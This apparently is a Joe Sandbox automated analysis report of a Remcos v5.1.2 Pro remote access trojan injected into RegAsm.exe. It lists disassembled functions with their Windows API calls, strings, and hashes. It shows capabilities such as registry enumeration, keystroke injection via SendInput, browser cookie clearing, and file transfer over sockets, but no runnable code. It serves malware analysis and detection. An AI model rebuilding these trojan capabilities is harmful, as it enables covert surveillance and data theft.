                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                          • String ID: C
                                                                                                                          • API String ID: 1679612858-1037565863
                                                                                                                          • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                          • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: tcp$udp
                                                                                                                          • API String ID: 0-3725065008
                                                                                                                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                          APIs
                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                          • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                          • String ID: PkG$XMG$NG$NG
                                                                                                                          • API String ID: 1649129571-3151166067
                                                                                                                          • Opcode ID: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                                                                                          • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                          • Opcode Fuzzy Hash: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                                                                                          • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                                                          • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                          • String ID: .part
                                                                                                                          • API String ID: 1303771098-3499674018
                                                                                                                          • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                          • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                          • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                          • String ID: .exe$02x$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                          • API String ID: 3286818993-953290301
                                                                                                                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                          APIs
                                                                                                                          • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Console$Window$AllocOutputShow
                                                                                                                          • String ID: Remcos v$5.1.2 Pro$CONOUT$
                                                                                                                          • API String ID: 4067487056-1584637518
                                                                                                                          • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                          • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                                                          • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                          • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                                                          APIs
                                                                                                                          • SendInput.USER32 ref: 00419A25
                                                                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InputSend$Virtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1167301434-0
                                                                                                                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: __freea$__alloca_probe_16_free
                                                                                                                          • String ID: a/p$am/pm$h{D
                                                                                                                          • API String ID: 2936374016-2303565833
                                                                                                                          • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                          • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                          • _free.LIBCMT ref: 00444E87
                                                                                                                          • _free.LIBCMT ref: 00444E9E
                                                                                                                          • _free.LIBCMT ref: 00444EBD
                                                                                                                          • _free.LIBCMT ref: 00444ED8
                                                                                                                          • _free.LIBCMT ref: 00444EEF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                          • String ID: KED
                                                                                                                          • API String ID: 3033488037-2133951994
                                                                                                                          • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                          • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                          APIs
                                                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Enum$InfoQueryValue
                                                                                                                          • String ID: [regsplt]$xUG$TG
                                                                                                                          • API String ID: 3554306468-1165877943
                                                                                                                          • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                          • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                                                          • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                          • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                                                          APIs
                                                                                                                          • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                                                          • __fassign.LIBCMT ref: 0044B4F9
                                                                                                                          • __fassign.LIBCMT ref: 0044B514
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1324828854-0
                                                                                                                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                          APIs
                                                                                                                          • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                          • __fassign.LIBCMT ref: 1000954F
                                                                                                                          • __fassign.LIBCMT ref: 1000956A
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1324828854-0
                                                                                                                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                          • String ID: xUG$NG$NG$TG
                                                                                                                          • API String ID: 3114080316-2811732169
                                                                                                                          • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                          • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                                          • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                          • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                                          APIs
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                          • API String ID: 1133728706-4073444585
                                                                                                                          • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                          • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                                          • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                          • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                          • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                          • _free.LIBCMT ref: 00450FC8
                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                          • _free.LIBCMT ref: 00450FD3
                                                                                                                          • _free.LIBCMT ref: 00450FDE
                                                                                                                          • _free.LIBCMT ref: 00451032
                                                                                                                          • _free.LIBCMT ref: 0045103D
                                                                                                                          • _free.LIBCMT ref: 00451048
                                                                                                                          • _free.LIBCMT ref: 00451053
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                          • _free.LIBCMT ref: 100092AB
                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                          • _free.LIBCMT ref: 100092B6
                                                                                                                          • _free.LIBCMT ref: 100092C1
                                                                                                                          • _free.LIBCMT ref: 10009315
                                                                                                                          • _free.LIBCMT ref: 10009320
                                                                                                                          • _free.LIBCMT ref: 1000932B
                                                                                                                          • _free.LIBCMT ref: 10009336
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
